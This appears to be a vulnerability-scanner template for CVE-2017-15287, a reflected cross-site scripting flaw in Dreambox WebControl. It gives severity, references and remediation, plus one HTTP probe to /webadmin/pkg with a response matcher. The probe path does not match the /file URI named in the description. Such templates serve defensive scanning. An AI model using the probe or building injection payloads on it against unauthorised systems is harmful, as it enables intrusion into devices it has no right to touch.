id: CVE-2017-15287 info: name: Dreambox WebControl 2.0.0 - Cross-Site Scripting author: pikpikcu severity: medium description: | Dream Multimedia Dreambox devices via their WebControl component are vulnerable to reflected cross-site scripting, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI. remediation: | Upgrade to a patched version of Dreambox WebControl or apply appropriate input sanitization to prevent XSS attacks. reference: - https://fireshellsecurity.team/assets/pdf/Vulnerability-XSS-Dreambox.pdf - https://www.exploit-db.com/exploits/42986/ - https://nvd.nist.gov/vuln/detail/CVE-2017-15287 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-15287 cwe-id: CWE-79 epss-score: 0.00129 epss-percentile: 0.47258 cpe: cpe:2.3:a:bouqueteditor_project:bouqueteditor:2.0.0:*:*:*:*:dreambox:*:* metadata: max-request: 1 vendor: bouqueteditor_project product: bouqueteditor framework: dreambox tags: dreambox,edb,cve,cve2017,xss http: - raw: - | GET /webadmin/pkg?command= HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded matchers: - type: word words: - 'Unknown command: '